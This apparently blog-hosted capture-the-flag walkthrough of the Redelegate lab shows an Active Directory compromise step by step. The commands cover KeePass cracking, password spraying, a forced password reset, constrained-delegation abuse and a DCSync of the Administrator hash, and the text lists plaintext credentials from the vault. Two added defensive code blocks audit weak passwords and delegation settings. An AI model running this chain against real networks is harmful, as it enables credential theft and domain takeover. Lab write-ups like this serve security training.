# Redelegate

## OVERVIEW

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160406935/f0af5174-99e5-4289-8875-fce36443de5c.png align="center")

We are given the IP of the machine, so let's start by scanning it with Nmap.

---

## ENUMERATION

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160456481/ba523036-9569-4f7c-a9eb-d9927d4104a9.png align="left")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160527547/1c702452-f065-4bbd-9264-697953fd1695.png align="center")

We see that anonymous login is allowed on FTP, so let's dump all of its contents and directories. Also, don't forget to add the domain and DC name to **<mark>/etc/hosts</mark>**.

To dump the contents of the FTP server using anonymous login:

```bash
wget -m --no-passive ftp://anonymous:anonymous@10.129.234.50
```

All the contents will be downloaded into your working directory.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767160774824/d0538a29-e702-40a3-9565-66c85aff3d24.png align="left")

Let's analyze each file one by one.  
Analyzing **CyberAudit.txt and TrainingAgenda.txt**, we find:

```plaintext
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password 
```

Only 7 attendees means people are probably still using **SeasonYear!**-style passwords. We also saw a **Shared.kdbx** file, which is a **KeePass 2.x** database; its password can be cracked with John The Ripper as follows:

```bash
# extract the database's master-key hash into a format john understands
keepass2john Shared.kdbx > keepass.hash

# crack it with a wordlist (the hash file is a required argument)
john --wordlist=/path-to-your-wordlist keepass.hash
```

Since we know people are using SeasonYear!-style passwords, let's quickly create a custom wordlist **pass.txt** of such passwords, one per season:

```plaintext
SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
```

**NOTE: we used the year 2024 because that is the year in CyberAudit.txt, as seen above. If you try to crack Shared.kdbx with rockyou.txt, it will take ages to complete.**
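The training agenda above is exactly the kind of pattern a password filter should reject. As an added example (not part of the original writeup), here is a policy check that flags season-plus-year passwords, including common leet spellings, two-digit years and trailing symbols; the sample passwords at the bottom are constructed for the demonstration.

```python
# Added example (not part of the original writeup): a password-policy check that
# flags the "SeasonYear!" pattern the training agenda above warns about, plus
# common leet spellings, 2-digit years and trailing symbols. The sample
# passwords at the bottom are constructed for this demonstration.
import re

SEASONS = ("spring", "summer", "autumn", "fall", "winter")
# letter -> regex class covering the usual leet substitutions for that letter
LEET = {"a": "[a@4]", "e": "[e3]", "i": "[i1!]", "o": "[o0]", "s": "[s$5]", "t": "[t7]"}


def leet_class(word):
    """Expand 'summer' into a regex like '[s$5]umm[e3]r'."""
    return "".join(LEET.get(ch, ch) for ch in word)


SEASON_YEAR = re.compile(
    r"^(?:" + "|".join(leet_class(s) for s in SEASONS) + r")"  # season word
    r"[^A-Za-z0-9]?"        # optional separator, e.g. Summer_2024
    r"(?:19|20)?\d{2}"      # 2- or 4-digit year
    r"[^A-Za-z0-9]{0,3}$",  # up to three trailing symbols, e.g. ! or !!
    re.IGNORECASE,
)


def is_seasonal_password(password):
    """True if the password is only a season plus a year with light decoration."""
    return SEASON_YEAR.match(password) is not None


def flag_weak(passwords):
    """Return the candidates a password filter should reject."""
    return [p for p in passwords if is_seasonal_password(p)]


# Constructed sample input: entries like the wordlist above plus stronger ones.
SAMPLE = ["Summer2024!", "W1nter2024!", "Spring_23", "$ummer24!!",
          "SeasonYear!", "correct-horse-battery", "Tq9#vLm2@xR8pZ"]
```

Run against a dump of chosen passwords at set-time (or a cracked-hash list after an audit), it shows which accounts would fall to the wordlist built below.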

Now let's try to crack the Shared.kdbx password using the above wordlist:

```bash
john --wordlist=/path-to-pass.txt keepass.hash
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767161964028/ecf98e2f-472a-4967-ab99-718a5ac7d7ac.png align="center")

We got the password successfully. Now let's use **kpcli** to open **Shared.kdbx**:

```bash
kpcli --kdb=Shared.kdbx
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767162119732/b0ab1401-6236-4147-925b-aef7bf3ea068.png align="left")

Now that you are inside, enumerate the directories with the **ls** and **cd** commands, and to view a particular password use the show command, e.g. show 0, show 1 and so on.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767162756340/6f9a2315-7905-43f3-9f38-996156a4d2f4.png align="left")

The passwords are masked with red highlighting, so to read them just copy and paste them into a text editor.

After fully enumerating Shared.kdbx and collecting all the passwords, make separate lists of users and passwords so we can work out which credentials are valid for which service:

```plaintext
Payroll
Timesheet
Administrator
FTPUser
SQLGuest
WordPress Panel
```

```plaintext
SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9
```

Now we can use NetExec to spray these credentials across services such as FTP, SMB, MSSQL, LDAP, WinRM, etc.

None of them worked on the services above except MSSQL:

```bash
nxc mssql 10.129.234.50 -u users.txt -p pass.txt --continue-on-success --local-auth
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767164123112/fcc9890f-1f34-4604-b39f-23ee955396c1.png align="center")

I used mssqlclient.py to enumerate the SQL server but couldn't find anything useful there to give us a lead, so I then thought about **--rid-brute using the MSSQL creds we got**:

```bash
nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --rid-brute --local-auth
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767164399586/251b0fb0-1088-4922-96d1-8a6dffbd20e0.png align="center")

**Now there is a possibility of password reuse with the new users we found, so let's spray the new users with our earlier pass.txt:**

```bash
nxc smb 10.129.234.50 -u new_users.txt -p pass.txt --continue-on-success
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767164953872/fd1bcad3-e05a-4c50-b9d9-fc937b426eaf.png align="left")

Here we go: we got the **Marie.Curie** user. But we are not able to get a foothold as Marie.Curie, and her shares are not of much use either, so let's run BloodHound to see what is happening.

```bash
bloodhound-python -u Marie.Curie -p 'REDACTED' -d redelegate.vl -ns 10.129.234.50 -c ALL --zip
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767166548352/9eb30414-6d25-4b1a-9394-fb3c3c4ae4af.png align="center")

Now, looking at High Value Targets from Owned Principals, we see:

```plaintext
Marie.Curie -> Member of HelpDesk@Redelegate.vl -> force change password -> Helen.Frost@Redelegate.vl
```

**So that means we can change the password of the Helen.Frost user and then get a shell/foothold as Helen.Frost:**

```bash
bloodyAD -d redelegate.vl -u Marie.Curie -p 'REDACTED' --host dc.redelegate.vl set password Helen.Frost 'Password123!'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767166863892/82393c12-cbcc-44a3-9062-b1558db8507e.png align="center")

The password was changed successfully; now let's see whether we can get a shell.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767166991065/b04c4f6d-684e-408a-86ef-064c50e3dc22.png align="center")

  
Yep, we can. So let's use evil-winrm to get the shell and grab the user flag.

---

## USER FLAG

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767167138872/993af5bb-935a-4ef1-a634-ce8a79869bc4.png align="left")

---

## PRIVILEGE ESCALATION

Let's see what privileges we have with **whoami /priv**:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767168248009/75ce29b5-829d-40a9-90fb-dd965fe29d65.png align="center")

**SeMachineAccountPrivilege and SeEnabledDelegationPrivilege are enabled**  
But we can neither add a machine account nor a DNS record:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767168894114/48ee05a9-6833-434f-a70e-632c64911513.png align="center")

**MachineAccountQuota** is 0 and we get **INSUFF\_ACCESS\_RIGHTS** when adding a DNS record to the domain.  
**(Usually this would be done with Marie.Curie's creds in order to obtain an NTLM hash via Responder, but I am just showing that adding a DNS record in the domain is not allowed regardless of the user.)**

So let's find another method to escalate privileges.  
In BloodHound we saw that the user Helen.Frost has Group Delegated Object Control:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767169176104/dbeb29e3-6e70-4dca-b19d-30aefda1bd3a.png align="center")

So the Helen.Frost user account is a member of the IT group, which has the GenericAll ACL on the FS01$ machine account.  
We know from our previous enumeration that we cannot add a DNS record or a machine account. So we cannot configure unconstrained delegation, because we would need to force the machine to craft a Kerberos ticket, which isn't possible with only an IP address; it requires an SPN and a DNS A record.  
  
**However, we can configure the FS01$ machine account to perform a full S4U2self + S4U2proxy (Constrained Delegation) attack on the DC$ machine account and use that service ticket to perform a DCSync attack**  
  
Since we have GenericAll on the FS01$ machine account, we can force-change its password using Helen.Frost's TGT:

```bash
getTGT.py redelegate.vl/helen.frost:'Password123!'

export KRB5CCNAME=helen.frost.ccache
```

```bash
bloodyAD -k --host 'dc.redelegate.vl' set password 'FS01$' 'Newpassword123!'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767169942175/79fdaf47-399f-48ad-a8c6-9fadcdeb0565.png align="center")

Now let's configure FS01$ with the TRUSTED\_TO\_AUTH\_FOR\_DELEGATION flag and the msDS-AllowedToDelegateTo attribute.  
Let's begin configuring:

```bash
bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767170925431/8d6c76c6-bec9-448b-88bc-64b957a6b9f5.png align="center")
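The two settings just written to FS01$ (protocol transition in userAccountControl plus a DC service in msDS-AllowedToDelegateTo) are exactly what a defender should be auditing for, since together they let the computer obtain a ticket to the DC as any user. The following is an added example, not code from the original writeup: an offline check over computer objects in the shape LDAP returns them, with the account records constructed as sample data.

```python
# Added example (not part of the original writeup): an offline audit of computer
# objects for the delegation settings the commands above give to FS01$.
# The account records are constructed sample data shaped like LDAP results.
TRUSTED_FOR_DELEGATION = 0x80000            # userAccountControl: unconstrained
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # userAccountControl: protocol transition
WORKSTATION_TRUST_ACCOUNT = 0x1000          # ordinary domain-joined computer


def spn_host(spn):
    """Return the lowercase host part of an SPN such as cifs/dc.redelegate.vl:445."""
    if "/" not in spn:
        return ""
    host = spn.split("/", 1)[1]
    return host.split("/", 1)[0].split(":", 1)[0].lower()


def delegation_findings(account, dc_hosts):
    """List risky delegation settings on one account dict (keys: sAMAccountName,
    userAccountControl as int, msDS-AllowedToDelegateTo as list of SPNs).
    dc_hosts is a set of lowercase domain-controller FQDNs."""
    name = account["sAMAccountName"]
    uac = account.get("userAccountControl", 0)
    findings = []
    if uac & TRUSTED_FOR_DELEGATION:
        findings.append(f"{name}: unconstrained delegation enabled")
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        findings.append(f"{name}: protocol transition enabled (S4U2self for any user)")
    for spn in account.get("msDS-AllowedToDelegateTo", []):
        if spn_host(spn) in dc_hosts:
            findings.append(f"{name}: constrained delegation to DC service {spn}")
    return findings


def audit(accounts, dc_hosts):
    """Map every account that has findings to its list of findings."""
    return {a["sAMAccountName"]: f for a in accounts
            if (f := delegation_findings(a, dc_hosts))}


# Constructed sample: FS01$ as configured above, plus an unremarkable WEB01$.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "FS01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dc.redelegate.vl"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
]
DC_HOSTS = {"dc.redelegate.vl"}
```

Feeding it a periodic LDAP export of computer objects turns the misconfiguration this writeup creates by hand into an alert rather than a surprise.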

**Now get a TGT for FS01$ in the same way as for Helen.Frost.**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767171322840/6f7ae6b1-bcbc-4a1e-a374-e624734889f1.png align="center")

Now get a service ticket impersonating dc:

```bash
getST.py -k -no-pass -spn cifs/dc.redelegate.vl -impersonate dc redelegate.vl/FS01$

export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767171768834/2164db99-8c9c-4d92-8b81-afe61914f634.png align="center")

Now let's perform a DCSync attack and grab the Administrator hash:

```bash
secretsdump.py -k -no-pass dc.redelegate.vl -just-dc-user Administrator
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767172080779/261a7579-a3fe-4960-bd40-f8d56da5dd56.png align="center")

We got the hash; now use it to get a shell and grab the root flag.

---

## ROOT FLAG

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767172205260/7adbb9a7-47b8-4321-81ed-2f07c98035c0.png align="center")

## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1767172314985/8b37c394-0dfb-4355-9831-d870595bbdc1.png align="center")

For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](http://reapsec.com/)

**THANKS FOR READING !!!**
